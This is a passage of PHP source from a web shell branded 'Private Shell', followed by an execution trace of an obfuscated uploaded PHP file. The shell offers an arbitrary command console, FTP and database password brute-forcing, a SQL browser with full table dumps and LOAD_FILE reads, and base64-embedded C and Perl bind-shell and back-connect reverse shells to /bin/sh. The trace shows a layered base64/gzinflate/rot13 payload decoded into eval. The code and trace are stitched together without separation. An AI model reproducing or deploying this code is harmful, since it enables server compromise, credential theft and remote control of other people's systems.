echo '<pre class="ml1" style="margin-top:5px" id="Output">' . $temp . '</pre>';
}
echo "</div>";
printFooter();
}
function actionConsole()
{
if (isset($_POST['ajax'])) {
$_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = true;
ob_start();
echo "document.cf.cmd.value='';\n";
$temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n\$ " . $_POST['p1'] . "\n" . ex($_POST['p1']), "\n\r\t\\'\x00"));
if (preg_match("!.*cd\\s+([^;]+)\$!", $_POST['p1'], $match)) {
if (@chdir($match[1])) {
$GLOBALS['cwd'] = @getcwd();
echo "document.mf.c.value='" . $GLOBALS['cwd'] . "';";
}
}
echo "document.cf.output.value+='" . $temp . "';";
echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
$temp = ob_get_clean();
echo strlen($temp), "\n", $temp;
exit;
}
printHeader();
?>
<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array("");
var cur = 0;
function kp(e) {
var n = (window.Event) ? e.which : e.keyCode;
if(n == 38) {
cur--;
if(cur>=0)
document.cf.cmd.value = cmds[cur];
else
cur++;
} else if(n == 40) {
cur++;
if(cur < cmds.length)
document.cf.cmd.value = cmds[cur];
else
cur--;
}
}
function add(cmd) {
cmds.pop();
cmds.push(cmd);
cmds.push("");
cur = cmds.length-1;
}
</script>
<?php
echo "<h1>Console</h1><div class=content><form name=cf onsubmit=\"if(document.cf.cmd.value=='clear'){document.cf.output.value='';document.cf.cmd.value='';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;\"><select name=alias>";
foreach ($GLOBALS['aliases'] as $n => $v) {
if ($v == '') {
echo '<optgroup label="-' . htmlspecialchars($n) . '-"></optgroup>';
continue;
}
echo '<option value="' . htmlspecialchars($v) . '">' . $n . '</option>';
}
if (empty($_POST['ajax']) && !empty($_POST['p1'])) {
$_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
}
echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 ' . ($_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
if (!empty($_POST['p1'])) {
echo htmlspecialchars("\$ " . $_POST['p1'] . "\n" . ex($_POST['p1']));
}
echo "</textarea><input type=text name=cmd style=\"border-top:0;width:100%;margin:0;\" onkeydown=\"kp(event);\">";
echo "</form></div><script>document.cf.cmd.focus();</script>";
printFooter();
}
function actionLogout()
{
unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
echo "bye!";
}
function actionSelfRemove()
{
printHeader();
if ($_POST['p1'] == 'yes') {
if (@unlink(SELF_PATH)) {
die('Shell has been removed');
} else {
echo "unlink error!";
}
}
echo "<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick=\"g(null,null,'yes')\">Yes</a></div>";
printFooter();
}
function actionBruteforce()
{
printHeader();
if (isset($_POST['proto'])) {
echo '<h1>Results</h1><div class=content><span>Type:</span> ' . htmlspecialchars($_POST['proto']) . ' <span>Server:</span> ' . htmlspecialchars($_POST['server']) . '<br>';
if ($_POST['proto'] == 'ftp') {
function bruteForce($ip, $port, $login, $pass)
{
$fp = @ftp_connect($ip, $port ? $port : 21);
if (!$fp) {
return false;
}
$res = @ftp_login($fp, $login, $pass);
@ftp_close($fp);
return $res;
}
} elseif ($_POST['proto'] == 'mysql') {
function bruteForce($ip, $port, $login, $pass)
{
$res = @mysql_connect($ip . ':' . $port ? $port : 3306, $login, $pass);
@mysql_close($res);
return $res;
}
} elseif ($_POST['proto'] == 'pgsql') {
function bruteForce($ip, $port, $login, $pass)
{
$str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=''";
$res = @pg_connect($server[0] . ':' . $server[1] ? $server[1] : 5432, $login, $pass);
@pg_close($res);
return $res;
}
}
$success = 0;
$attempts = 0;
$server = explode(":", $_POST['server']);
if ($_POST['type'] == 1) {
$temp = @file('/etc/passwd');
if (is_array($temp)) {
foreach ($temp as $line) {
$line = explode(":", $line);
++$attempts;
if (bruteForce(@$server[0], @$server[1], $line[0], $line[0])) {
$success++;
echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($line[0]) . '<br>';
}
if (@$_POST['reverse']) {
$tmp = "";
for ($i = strlen($line[0]) - 1; $i >= 0; --$i) {
$tmp .= $line[0][$i];
}
++$attempts;
if (bruteForce(@$server[0], @$server[1], $line[0], $tmp)) {
$success++;
echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($tmp);
}
}
}
}
} elseif ($_POST['type'] == 2) {
$temp = @file($_POST['dict']);
if (is_array($temp)) {
foreach ($temp as $line) {
$line = trim($line);
++$attempts;
if (bruteForce($server[0], @$server[1], $_POST['login'], $line)) {
$success++;
echo '<b>' . htmlspecialchars($_POST['login']) . '</b>:' . htmlspecialchars($line) . '<br>';
}
}
}
}
echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>";
}
echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td><td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td><input type=hidden name=c value="' . htmlspecialchars($GLOBALS['cwd']) . '">' . '<input type=hidden name=a value="' . htmlspecialchars($_POST['a']) . '">' . '<input type=hidden name=charset value="' . htmlspecialchars($_POST['charset']) . '">' . '<span>Server:port</span></td>' . '<td><input type=text name=server value="127.0.0.1"></td></tr>' . '<tr><td><span>Brute type</span></td>' . '<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' . '<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' . '<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' . '<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' . '<td><input type=text name=login value="komsen"></td></tr>' . '<tr><td><span>Dictionary</span></td>' . '<td><input type=text name=dict value="' . htmlspecialchars($GLOBALS['cwd']) . 'passwd.dic"></td></tr></table>' . '</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
echo "</div><br>";
printFooter();
}
function actionSql()
{
class DbClass
{
var $type;
var $link;
var $res;
function DbClass($type)
{
$this->type = $type;
}
function connect($host, $user, $pass, $dbname)
{
switch ($this->type) {
case 'mysql':
if ($this->link = @mysql_connect($host, $user, $pass, true)) {
return true;
}
break;
case 'pgsql':
$host = explode(':', $host);
if (!$host[1]) {
$host[1] = 5432;
}
if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) {
return true;
}
break;
}
return false;
}
function selectdb($db)
{
switch ($this->type) {
case 'mysql':
if (@mysql_select_db($db)) {
return true;
}
break;
}
return false;
}
function query($str)
{
switch ($this->type) {
case 'mysql':
return $this->res = @mysql_query($str);
case 'pgsql':
return $this->res = @pg_query($this->link, $str);
}
return false;
}
function fetch()
{
$res = func_num_args() ? func_get_arg(0) : $this->res;
switch ($this->type) {
case 'mysql':
return @mysql_fetch_assoc($res);
case 'pgsql':
return @pg_fetch_assoc($res);
}
return false;
}
function listDbs()
{
switch ($this->type) {
case 'mysql':
return $this->res = @mysql_list_dbs($this->link);
case 'pgsql':
return $this->res = $this->query("SELECT datname FROM pg_database");
}
return false;
}
function listTables()
{
switch ($this->type) {
case 'mysql':
return $this->res = $this->query('SHOW TABLES');
case 'pgsql':
return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'");
}
return false;
}
function error()
{
switch ($this->type) {
case 'mysql':
return @mysql_error($this->link);
case 'pgsql':
return @pg_last_error($this->link);
}
return false;
}
function setCharset($str)
{
switch ($this->type) {
case 'mysql':
if (function_exists('mysql_set_charset')) {
return @mysql_set_charset($str, $this->link);
} else {
$this->query('SET CHARSET ' . $str);
}
break;
case 'mysql':
return @pg_set_client_encoding($this->link, $str);
}
return false;
}
function dump($table)
{
switch ($this->type) {
case 'mysql':
$res = $this->query('SHOW CREATE TABLE `' . $table . '`');
$create = mysql_fetch_array($res);
echo $create[1] . ";\n\n";
$this->query('SELECT * FROM `' . $table . '`');
while ($item = $this->fetch()) {
$columns = array();
foreach ($item as $k => $v) {
$item[$k] = "'" . @mysql_real_escape_string($v) . "'";
$columns[] = "`" . $k . "`";
}
echo 'INSERT INTO `' . $table . '` (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');' . "\n";
}
break;
case 'pgsql':
$this->query('SELECT * FROM ' . $table);
while ($item = $this->fetch()) {
$columns = array();
foreach ($item as $k => $v) {
$item[$k] = "'" . addslashes($v) . "'";
$columns[] = $k;
}
echo 'INSERT INTO ' . $table . ' (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');' . "\n";
}
break;
}
return false;
}
}
$db = new DbClass($_POST['type']);
if (@$_POST['p2'] == 'download') {
ob_start("ob_gzhandler", 4096);
$db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
$db->selectdb($_POST['sql_base']);
header("Content-Disposition: attachment; filename=dump.sql");
header("Content-Type: text/plain");
foreach ($_POST['tbl'] as $v) {
$db->dump($v);
}
exit;
}
printHeader();
?>
<h1>Sql browser</h1><div class=content>
<form name="sf" method="post">
<table cellpadding="2" cellspacing="0">
<tr>
<td>Type</td>
<td>Host</td>
<td>Login</td>
<td>Password</td>
<td>Database</td>
<td></td>
</tr>
<tr>
<input type=hidden name=a value=Sql>
<input type=hidden name=p1 value='query'>
<input type=hidden name=p2>
<input type=hidden name=c value='<?php
echo htmlspecialchars($GLOBALS['cwd']);
?>'>
<input type=hidden name=charset value='<?php
echo isset($_POST['charset']) ? $_POST['charset'] : '';
?>'>
<td>
<select name='type'>
<option value="mysql" <?php
if (@$_POST['type'] == 'mysql') {
echo "selected";
}
?>>MySql</option>
<option value="pgsql" <?php
if (@$_POST['type'] == 'pgsql') {
echo "selected";
}
?>>PostgreSql</option>
</select></td>
<td><input type=text name=sql_host value='<?php
echo empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host']);
?>'></td>
<td><input type=text name=sql_login value='<?php
echo empty($_POST['sql_login']) ? 'root' : htmlspecialchars($_POST['sql_login']);
?>'></td>
<td><input type=text name=sql_pass value='<?php
echo empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass']);
?>'></td>
<td>
<?php
$tmp = "<input type=text name=sql_base value=''>";
if (isset($_POST['sql_host'])) {
if ($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
switch ($_POST['charset']) {
case "Windows-1251":
$db->setCharset('cp1251');
break;
case "UTF-8":
$db->setCharset('utf8');
break;
case "KOI8-R":
$db->setCharset('koi8r');
break;
case "KOI8-U":
$db->setCharset('koi8u');
break;
case "cp866":
$db->setCharset('cp866');
break;
}
$db->listDbs();
echo "<select name=sql_base><option value=''></option>";
while ($item = $db->fetch()) {
list($key, $value) = each($item);
echo '<option value="' . $value . '" ' . ($value == $_POST['sql_base'] ? 'selected' : '') . '>' . $value . '</option>';
}
echo "</select>";
} else {
echo $tmp;
}
} else {
echo $tmp;
}
?></td>
<td><input type=submit value=">>"></td>
</tr>
</table>
<script>
function st(t,l) {
document.sf.p1.value = 'select';
document.sf.p2.value = t;
if(l!=null)document.sf.p3.value = l;
document.sf.submit();
}
function is() {
for(i=0;i<document.sf.elements['tbl[]'].length;++i)
document.sf.elements['tbl[]'][i].checked = !document.sf.elements['tbl[]'][i].checked;
}
</script>
<?php
if (isset($db) && $db->link) {
echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
if (!empty($_POST['sql_base'])) {
$db->selectdb($_POST['sql_base']);
echo "<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span><br><br>";
$tbls_res = $db->listTables();
while ($item = $db->fetch($tbls_res)) {
list($key, $value) = each($item);
$n = $db->fetch($db->query('SELECT COUNT(*) as n FROM ' . $value . ''));
$value = htmlspecialchars($value);
echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'> <a href=# onclick=\"st('" . $value . "')\">" . $value . "</a> (" . $n['n'] . ")</nobr><br>";
}
echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:2px solid #666;'>";
if (@$_POST['p1'] == 'select') {
$_POST['p1'] = 'query';
$db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2'] . '');
$num = $db->fetch();
$num = $num['n'];
echo "<span>" . $_POST['p2'] . "</span> ({$num}) ";
for ($i = 0; $i < $num / 30; $i++) {
if ($i != (int) $_POST['p3']) {
echo "<a href='#' onclick='st(\"" . $_POST['p2'] . "\", {$i})'>", $i + 1, "</a> ";
} else {
echo $i + 1, " ";
}
}
if ($_POST['type'] == 'pgsql') {
$_POST['p3'] = 'SELECT * FROM ' . $_POST['p2'] . ' LIMIT 30 OFFSET ' . $_POST['p3'] * 30;
} else {
$_POST['p3'] = 'SELECT * FROM `' . $_POST['p2'] . '` LIMIT ' . $_POST['p3'] * 30 . ',30';
}
echo "<br><br>";
}
if (@$_POST['p1'] == 'query' && !empty($_POST['p3'])) {
$db->query(@$_POST['p3']);
if ($db->res !== false) {
$title = false;
echo "<table width=100% cellspacing=0 cellpadding=2 class=main>";
$line = 1;
while ($item = $db->fetch()) {
if (!$title) {
echo "<tr>";
foreach ($item as $key => $value) {
echo '<th>' . $key . '</th>';
}
reset($item);
$title = true;
echo "</tr><tr>";
$line = 2;
}
echo '<tr class="l' . $line . '">';
$line = $line == 1 ? 2 : 1;
foreach ($item as $key => $value) {
if ($value == null) {
echo "<td><i>null</i></td>";
} else {
echo '<td>' . nl2br(htmlspecialchars($value)) . '</td>';
}
}
echo "</tr>";
}
echo "</table>";
} else {
echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>';
}
}
echo "<br><textarea name='p3' style='width:100%;height:100px'>" . @htmlspecialchars($_POST['p3']) . "</textarea><br/><input type=submit value='Execute'>";
echo "</td></tr>";
}
echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
if (@$_POST['p1'] == 'loadfile') {
$db->query("SELECT LOAD_FILE('" . addslashes($_POST['p2']) . "') as file");
$file = $db->fetch();
echo '<pre class=ml1>' . htmlspecialchars($file['file']) . '</pre>';
}
}
echo "</div>";
printFooter();
}
function actionNetwork()
{
printHeader();
$back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
$back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
$bind_port_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
$bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
?>
<h1>Network tools</h1><div class=content>
<form name='nfp' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;">
<span>Bind port to /bin/sh</span><br/>
Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name="using"><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value=">>">
</form>
<form name='nfp' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;">
<span>Back-connect to</span><br/>
Server: <input type='text' name='server' value='<?php
echo $_SERVER['REMOTE_ADDR'];
?>'> Port: <input type='text' name='port' value='31337'> Using: <select name="using"><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value=">>">
</form><br>
<?php
if (isset($_POST['p1'])) {
function cf($f, $t)
{
$w = @fopen($f, "w") or @function_exists('file_put_contents');
if ($w) {
@fwrite($w, @base64_decode($t)) or @fputs($w, @base64_decode($t)) or @file_put_contents($f, @base64_decode($t));
@fclose($w);
}
}
if ($_POST['p1'] == 'bpc') {
cf("/tmp/bp.c", $bind_port_c);
$out = ex("gcc -o /tmp/bp /tmp/bp.c");
@unlink("/tmp/bp.c");
$out .= ex("/tmp/bp " . $_POST['p2'] . " " . $_POST['p3'] . " &");
echo "<pre class=ml1>{$out}\n" . ex("ps aux | grep bp") . "</pre>";
}
if ($_POST['p1'] == 'bpp') {
cf("/tmp/bp.pl", $bind_port_p);
$out = ex(which("perl") . " /tmp/bp.pl " . $_POST['p2'] . " &");
echo "<pre class=ml1>{$out}\n" . ex("ps aux | grep bp.pl") . "</pre>";
}
if ($_POST['p1'] == 'bcc') {
cf("/tmp/bc.c", $back_connect_c);
$out = ex("gcc -o /tmp/bc /tmp/bc.c");
@unlink("/tmp/bc.c");
$out .= ex("/tmp/bc " . $_POST['p2'] . " " . $_POST['p3'] . " &");
echo "<pre class=ml1>{$out}\n" . ex("ps aux | grep bc") . "</pre>";
}
if ($_POST['p1'] == 'bcp') {
cf("/tmp/bc.pl", $back_connect_p);
$out = ex(which("perl") . " /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " &");
echo "<pre class=ml1>{$out}\n" . ex("ps aux | grep bc.pl") . "</pre>";
}
}
echo "</div>";
printFooter();
}
if (empty($_POST['a'])) {
if (isset($default_action) && function_exists('action' . $default_action)) {
$_POST['a'] = $default_action;
} else {
$_POST['a'] = 'SecInfo';
}
}
if (!empty($_POST['a']) && function_exists('action' . $_POST['a'])) {
call_user_func('action' . $_POST['a']);
}
?>
<div id="cot_tl_fixed"><marquee>Private Shell - Wireless crew © Copyleft 2009 -Pro_Wikileaks </marquee></div>
Hacker-newbie.org </marquee></div><?php
};
exit;Execution traces
data/traces/9d33cbaa3b2aafa7a04991a20c8242f9_trace-1676257661.3311.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:08:07.228977]
1 0 1 0.000178 393512
1 3 0 0.000497 431192 {main} 1 /var/www/html/uploads/refo1.php 0 0
1 A /var/www/html/uploads/refo1.php 2 $UeXploiT = 'Sy1LzNFQKyzNL7G2V0svsYYw9YpLiuKL8ksMjTXSqzLz0nISS1KBrNK85PzcgqLU4mLqCCclFqeamcSnpCbnp6RqAO0sSi3TUHHMM8iLN64IyMnPDEkN0kQC1gA='
1 A /var/www/html/uploads/refo1.php 3 $An0n_3xPloiTeR = '=4Ne/SscyJHBmrmewO7YAt8H/DaOncTX+VAH/4b5NX/bA5VZJ0kYh+BPB/2cZO9DwFk31Hj3ZxV8jaFlkHIiO6lC0W/4/qyHTzlULnnZTIgDW9l4FqJc4djBjN7v81wfYaOYdNw3bNYjsvTPbvKmbgXuqAx52BVsAvYOHG6mUY4EuaLrgOEmVxU7cPZVOFb/Xu76t6BdG3WmxGBkSpgNI6iIj6rnLUSdpYqlCYO5dkbO7Ez7J6OyqdOPrbRCuaeUwFzvbfIr3b+HL8HStvik7MY1DmSRv7SRvzC7Dvfk6dW/I3r8hl0FvKTQlw1ic7SPyQpLySuLy3dtg1PtMq+KwnJ5Ql0RkcDjaA0GNLtZTsQczPDFCTDv504L+IX2UurFMKUyQhsybkeiV+ry3aQcL1wVVcQnIaXjmm7tR4xexrXVLKOybMLKHBjz4SIMlsaQiqYZIDmknyCVQWWl1Rs6qoUgg5jtn8XJaL+aV1tRGZ1M9oo69G4E8MtDzYFL3G/I'
2 4 0 0.000580 431192 base64_decode 0 /var/www/html/uploads/refo1.php 4 1 'Sy1LzNFQKyzNL7G2V0svsYYw9YpLiuKL8ksMjTXSqzLz0nISS1KBrNK85PzcgqLU4mLqCCclFqeamcSnpCbnp6RqAO0sSi3TUHHMM8iLN64IyMnPDEkN0kQC1gA='
2 4 1 0.000600 431384
2 4 R 'K-K��P+,�/��WK/��0��K���K\f�5ҫ2��r\022KR��Ҽ�܂���b�\b\'%\026���ħ�&秤j\000�,J-�Pq�3ȋ7�\b���\fI\r�D\002�\000'
2 5 0 0.000636 431352 gzinflate 0 /var/www/html/uploads/refo1.php 4 1 'K-K��P+,�/��WK/��0��K���K\f�5ҫ2��r\022KR��Ҽ�܂���b�\b\'%\026���ħ�&秤j\000�,J-�Pq�3ȋ7�\b���\fI\r�D\002�\000'
2 5 1 0.000663 431608
2 5 R 'eval("?>".str_rot13(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(base64_decode(strrev($An0n_3xPloiTeR))))))))))));'
2 6 0 0.000684 431416 htmlspecialchars_decode 0 /var/www/html/uploads/refo1.php 4 1 'eval("?>".str_rot13(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(base64_decode(strrev($An0n_3xPloiTeR))))))))))));'
2 6 1 0.000704 431704
2 6 R 'eval("?>".str_rot13(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(base64_decode(strrev($An0n_3xPloiTeR))))))))))));'
2 7 0 0.000738 434576 eval 1 'eval("?>".str_rot13(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(base64_decode(strrev($An0n_3xPloiTeR))))))))))));' /var/www/html/uploads/refo1.php 4 0
3 8 0 0.000757 434576 strrev 0 /var/www/html/uploads/refo1.php(4) : eval()'d code 1 1 '=4Ne/SscyJHBmrmewO7YAt8H/DaOncTX+VAH/4b5NX/bA5VZJ0kYh+BPB/2cZO9DwFk31Hj3ZxV8jaFlkHIiO6lC0W/4/qyHTzlULnnZTIgDW9l4FqJc4djBjN7v81wfYaOYdNw3bNYjsvTPbvKmbgXuqAx52BVsAvYOHG6mUY4EuaLrgOEmVxU7cPZVOFb/Xu76t6BdG3WmxGBkSpgNI6iIj6rnLUSdpYqlCYO5dkbO7Ez7J6OyqdOPrbRCuaeUwFzvbfIr3b+HL8HStvik7MY1DmSRv7SRvzC7Dvfk6dW/I3r8hl0FvKTQlw1ic7SPyQpLySuLy3dtg1PtMq+KwnJ5Ql0RkcDjaA0GNLtZTsQczPDFCTDv504L+IX2UurFMKUyQhsybkeiV+ry3aQcL1wVVcQnIaXjmm7tR4xexrXVLKOybMLKHBjz4SIMlsaQiqYZIDmknyCVQWWl1Rs6qoUgg5jtn8XJaL+aV1tRGZ1M9oo69G4E8MtDzYFL3G/I'
3 8 1 0.000804 463280
3 8 R 'eJwBxkg5twHBSD63eJwBtkhJtwGxSE63eJwBpkhZtwGhSF63eJwBlkhpt+29f3fTurIw/P9d634H4927nWzSNEkLG9ompZSmpUB/t1Aob07sbTtNi2M7ianD4bu/MyPZlm3ZSYG9z13P84RFE1uj0WgkjUaj0Whzy5ga//1fS19ulbay1Oue7r4+3f2kXezt7fQuXnb3tM8bkDpMp3aPdy939nrbhx9PWboV2H5bBSRqXQVgFd+5U9+9b4+D0O9NfLvn6n3b79tWRZ3atmGtr6xYxt3Uce9980u979srlnPj14GYrYEZtgnj74HX/vNZq/ln89mfrWfP/1x79nTteWv12Z9rahVKCMYVVojSbivN6rf//q/v//1ffmj58EuBz5KLmPBPL+gHdgXz4Ht6Y/m2btgVgqkpx/u7Vy+hRvBV+2X0ycuKito93dvf3d7bPdzunp3u1mxz4EeZOOsor3/ruywnprL0TMWVb1HCd/Yl8IAe3amubgZj05n5imXf'
